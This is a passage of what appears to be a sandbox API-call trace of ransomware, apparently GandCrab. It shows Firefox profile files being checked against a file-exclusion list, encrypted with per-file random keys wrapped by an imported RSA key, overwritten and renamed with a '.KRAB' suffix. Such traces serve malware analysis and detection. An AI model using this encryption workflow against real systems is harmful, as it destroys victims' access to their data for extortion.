dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.463] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.464] CloseHandle (hObject=0x7e4) returned 1 [0079.465] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.465] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.krab")) returned 1 [0079.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.466] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0079.466] lstrcmpW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2=".") returned 1 [0079.466] lstrcmpW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="..") returned 1 [0079.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" [0079.467] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0079.467] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.KRAB") returned 179 [0079.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0079.467] lstrlenW (lpString=".jsonlz4") returned 8 [0079.467] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.467] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0079.467] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0079.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="desktop.ini") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="autorun.inf") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="iconcache.db") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="boot.ini") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="thumbs.db") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0079.468] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntldr") returned -1 [0079.469] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0079.469] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0079.469] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.469] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011238) returned 1 [0079.471] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.471] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.471] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.471] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0079.471] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0079.472] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.472] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011898) returned 1 [0079.473] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.474] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.474] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.474] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0079.474] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0079.474] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.474] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010bd8) returned 1 [0079.534] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0079.534] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.537] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.546] GetLastError () returned 0x0 [0079.546] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0079.546] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0079.546] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011788) returned 1 [0079.550] CryptImportKey (in: hProv=0x1011788, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0079.550] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.550] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.551] GetLastError () returned 0x0 [0079.551] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0079.551] CryptReleaseContext (hProv=0x1011788, dwFlags=0x0) returned 1 [0079.551] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0079.560] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0079.561] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0079.561] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x149b, lpOverlapped=0x0) returned 1 [0079.748] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffeb65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.748] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x149b, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x149b, lpOverlapped=0x0) returned 1 [0079.748] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0079.748] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.756] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.756] CloseHandle (hObject=0x7e4) returned 1 [0079.765] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.765] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.krab")) returned 1 [0079.766] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.766] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0079.766] lstrcmpW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2=".") returned 1 [0079.766] lstrcmpW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="..") returned 1 [0079.766] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" [0079.766] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0079.767] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.KRAB") returned 179 [0079.767] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0079.767] lstrlenW (lpString=".jsonlz4") returned 8 [0079.767] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.767] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0079.767] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.768] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0079.768] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="desktop.ini") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="autorun.inf") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="iconcache.db") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="boot.ini") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="thumbs.db") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0079.768] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntldr") returned -1 [0079.769] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0079.769] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0079.769] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.771] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011018) returned 1 [0079.772] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.773] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.773] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.793] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0079.793] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0079.793] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.794] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010e80) returned 1 [0079.795] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.796] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.796] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.796] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0079.796] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0079.796] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.797] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10115f0) returned 1 [0079.799] CryptImportKey (in: hProv=0x10115f0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0079.800] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.800] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.800] GetLastError () returned 0x0 [0079.800] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0079.800] CryptReleaseContext (hProv=0x10115f0, dwFlags=0x0) returned 1 [0079.800] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10114e0) returned 1 [0079.805] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0079.805] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.805] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.805] GetLastError () returned 0x0 [0079.805] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0079.805] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0079.806] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0079.843] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0079.843] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0079.844] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1825, lpOverlapped=0x0) returned 1 [0080.023] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffe7db, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.023] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1825, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1825, lpOverlapped=0x0) returned 1 [0080.023] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0080.023] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.028] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.029] CloseHandle (hObject=0x7e4) returned 1 [0080.037] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.038] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.krab")) returned 1 [0080.116] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.117] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0080.117] lstrcmpW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2=".") returned 1 [0080.117] lstrcmpW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="..") returned 1 [0080.117] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" [0080.117] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.117] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.KRAB") returned 179 [0080.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0080.185] lstrlenW (lpString=".jsonlz4") returned 8 [0080.185] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.186] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0080.186] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.186] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0080.186] lstrlenW 